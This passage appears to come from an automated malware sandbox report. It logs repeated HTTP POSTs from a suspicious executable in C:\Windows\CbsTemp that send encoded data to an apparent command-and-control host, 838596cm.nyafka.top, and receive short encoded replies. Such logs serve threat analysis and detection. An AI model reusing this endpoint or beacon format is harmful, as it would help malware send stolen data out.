                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:55.895045042 CET1852OUTData Raw: 55 5d 5e 57 5c 5c 53 59 5e 5f 57 54 56 5a 59 5e 57 54 58 5d 50 5a 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U]^W\\SY^_WTVZY^WTX]PZVP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ [<<$3._?=X;43=>6)+)Z3%(10*8Y">'-#_&'P-7
                                                                                                          Jan 8, 2025 17:13:55.989758015 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:56.241077900 CET953INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:56 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vY9ynzDZ0BID5OWNN0zCV0tiBPCs3kUmvgI3Jf7R1rXWgouRqn8H0cvIk6RQQyjUAt2pqm0fuqF3ShXKApcMoEdx4zZAjc927f%2BxjKlBYkjjkT72nrDQ3QctZBxZHOxvz9Wwp%2F%2Fr"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a48aeb1729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3644&min_rtt=1955&rtt_var=4112&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2201&delivery_rate=94357&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0d 24 13 27 06 37 3b 00 0f 2b 04 3f 1d 2a 23 26 10 2e 00 2b 01 27 34 38 1a 25 12 2c 5d 22 2f 39 5b 2b 16 25 59 24 25 34 56 2a 2b 20 5c 04 1f 24 1b 28 01 3d 10 2a 06 2a 15 30 0a 39 13 26 33 0e 5c 32 3e 30 03 30 07 22 56 21 29 33 13 3b 0d 08 50 2e 38 20 59 2a 24 2c 5d 26 3e 2f 50 0f 10 38 54 2c 3a 2f 5b 36 0f 07 0e 35 30 2b 5a 20 26 27 03 2a 3e 30 0b 36 3f 3e 07 27 55 36 0b 23 0b 2f 1f 24 1d 30 05 3f 1f 23 0a 3c 19 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98'$'7;+?*#&.+'48%,]"/9[+%Y$%4V*+ \$(=**09&3\2>00"V!)3;P.8 Y*$,]&>/P8T,:/[650+Z &'*>06?>'U6#/$0?#<$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          75192.168.2.550058104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:55.669076920 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:56.019989014 CET2528OUTData Raw: 50 56 5e 55 59 59 53 5c 5e 5f 57 54 56 5e 59 59 57 5f 58 58 50 54 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^UYYS\^_WTV^YYW_XXPTVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(+003>9.$0*"(+';:R+"*7!#].#_&'P-+
                                                                                                          Jan 8, 2025 17:13:56.140156984 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:56.412748098 CET803INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:56 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxlhHaHzqSanGdq7EWgdJm4V%2BAZu60QGjXUGsY4bdmZk8LeJ5hfMuQIZtmSrruUOAOcw3n%2F%2Flk0ab5aOp1oj2i%2FmJ6o0Aun0uXXW53InGC07WGr%2BRu9SdYOdxe9Zs1FGIGqnvI50"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a498999727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5025&min_rtt=1976&rtt_var=6839&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=55368&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:13:56.504388094 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          76192.168.2.550059104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:57.279416084 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:57.629504919 CET2532OUTData Raw: 55 54 5b 53 59 5c 56 53 5e 5f 57 54 56 5b 59 58 57 50 58 52 50 58 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT[SY\VS^_WTV[YXWPXRPXV_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +_$1*>)].40?.&*8&3%(T?(,4!>#].?#_&'P-3
                                                                                                          Jan 8, 2025 17:13:57.733865976 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:58.000607967 CET811INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:57 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ri67NeShSpCmyJ0t9L%2BkO%2FKXehJAHtos%2BSSrAlWTgOJhll6bEEdyGX1XIESPPbiOyFZ53lVbi7NPjhlmE4Oh1JO%2ByfO01XX%2FJLrvbLEpco%2B1ZKaSlbvUx9HHY5gLHJcigkAIh6Ur"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a5389eb43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8147&min_rtt=1572&rtt_var=13740&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=26949&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          77192.168.2.550060104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:58.160156965 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:58.504412889 CET2532OUTData Raw: 50 57 5e 57 59 5f 53 5e 5e 5f 57 54 56 5b 59 5b 57 52 58 5f 50 5f 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW^WY_S^^_WTV[Y[WRX_P_VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ [(;+' .)=)X.4+=X)(+9'8%<"\>Z .<./#_&'P-3
                                                                                                          Jan 8, 2025 17:13:58.607022047 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:58.927630901 CET800INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:58 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78pWZdaD0bo9F6IvM38h7SN60kBDSA5IAtOlDVww%2Bn8Ur%2BYOWwVBe7y7pyUhnoLhTWBe7vSlgORLmAzZ3vUBUvYnNLNPnj3H9lcigHUkqNj5zYIDVRIsp7ncK%2BS7CZQw4XMPSULn"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a590b40424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8287&min_rtt=1646&rtt_var=13901&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=26651&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:13:59.014941931 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          78192.168.2.550061104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:59.149316072 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:59.504462957 CET2532OUTData Raw: 50 50 5b 54 59 5c 53 58 5e 5f 57 54 56 57 59 5f 57 5e 58 5b 50 5c 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PP[TY\SX^_WTVWY_W^X[P\VZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+7%#&Z*-*;4'>>9>X'1+2#)$"89#_&'P-
                                                                                                          Jan 8, 2025 17:13:59.593327999 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:59.769481897 CET809INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:59 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZkxlCK%2BqRn6Zvz%2B6%2BSK6hbm15tBB5%2FEeiqdz01r6fEFuk4zNq3FYlQB7N185WJ1XSBPPbPIPxsD8us0P3RThSLo8yTkh2YUuusIQ40vOueCgoLBIDNrXQadgq7EPxrA8UCZojbG"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a5f2d5343b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2140&min_rtt=1589&rtt_var=1698&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=243333&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          79192.168.2.550062104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:00.074603081 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:00.426297903 CET2532OUTData Raw: 55 54 5b 54 59 5f 56 5d 5e 5f 57 54 56 57 59 5b 57 5f 58 58 50 5d 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT[TY_V]^_WTVWY[W_XXP]VZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +(^$>>.:/?\)=Z((*3-<1/_)0Y5=.#_&'P-
                                                                                                          Jan 8, 2025 17:14:00.521079063 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:00.781835079 CET799INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:00 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NG9DqlfevhWuvuuSnGBeGWgN5Wu3asQHwfNf3bTITTudFdgi7%2FT2eURYpcr61cJZgzyyVicOljF%2BkHCv2VK0EAR65sNDRo58yWKJKlH3bKwb3hXoucprO20M6XAjB2q5%2FmBaEYEJ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a64fd4d727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3723&min_rtt=2024&rtt_var=4157&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=93487&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:14:00.868566036 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          80192.168.2.550063104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:01.004168034 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          81192.168.2.550064104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:01.260843039 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:01.613718987 CET1828OUTData Raw: 55 5d 5e 54 59 59 56 5b 5e 5f 57 54 56 5f 59 52 57 53 58 5e 50 59 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U]^TYYV[^_WTV_YRWSX^PYVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#*8'#?=X/(?>6)+"$8.("'>7";9?#_&'P-#
                                                                                                          Jan 8, 2025 17:14:01.707508087 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:01.918657064 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:01.971962929 CET959INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:01 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WBJb7be27oeHTjE4aJCni%2F%2FJZPXGuYmqWj5xexq%2FIOI9IrBhbfLrwmYRNAHo0qzM8Eir5cRiEmnDL7RvVkI9QjPcFMS6Ebu8%2BCJ%2FnTftp2XprK81v2GwfYdHFdeGatSSvIwN%2BZCL"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a6c5f8c424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1599&rtt_var=854&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2177&delivery_rate=557464&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0c 33 04 3f 03 20 3b 31 56 3f 29 24 01 3d 30 39 03 2d 29 0e 5b 25 1a 02 14 32 2c 2b 02 20 2f 00 00 3c 38 31 5d 24 26 23 0e 2b 2b 20 5c 04 1f 27 00 2b 28 35 1f 3e 01 35 05 27 20 31 10 25 23 09 01 26 03 2b 5b 27 39 0c 52 37 39 0d 1c 2e 20 32 50 2e 28 27 02 2a 37 0d 05 24 2e 2f 50 0f 10 3b 0c 39 2a 27 1e 22 31 3a 57 21 55 24 04 23 26 30 13 3e 13 38 09 35 3f 3e 05 27 33 39 50 20 31 27 12 33 1d 0a 05 28 0f 2c 1e 3f 33 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98'3? ;1V?)$=09-)[%2,+ /<81]$&#++ \'+(5>5' 1%#&+['9R79. 2P.('*7$./P;9*'"1:W!U$#&0>85?>'39P 1'3(,?3$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          82192.168.2.550065104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:01.400342941 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:01.754358053 CET2532OUTData Raw: 50 50 5e 5e 5c 5f 56 5b 5e 5f 57 54 56 58 59 5e 57 50 58 5b 50 5a 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PP^^\_V[^_WTVXY^WPX[PZVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X*8($3!=.>,4Z==&(;%'+)+T$*,("+9/#_&'P-?
                                                                                                          Jan 8, 2025 17:14:01.883395910 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:02.044538021 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:01 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khQ9%2BLF1TGGHxSEsAv4fwgqj7UEJrHc7ETicvJ7ddg3Kn6mwtqUXJY97Gr7H4qXPnhcJwAKRtTjh4CjPAhRbT%2BxuxmovQWgf6DBHVYuO19i4RXYS57s3MMlPAJrxJgNlpjldZ79v"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a6d7d230f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3696&min_rtt=1664&rtt_var=4688&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=81459&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          83192.168.2.550066104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:02.651886940 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:03.004832983 CET2532OUTData Raw: 55 55 5b 55 59 5c 56 5b 5e 5f 57 54 56 5f 59 5b 57 53 58 5c 50 5f 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
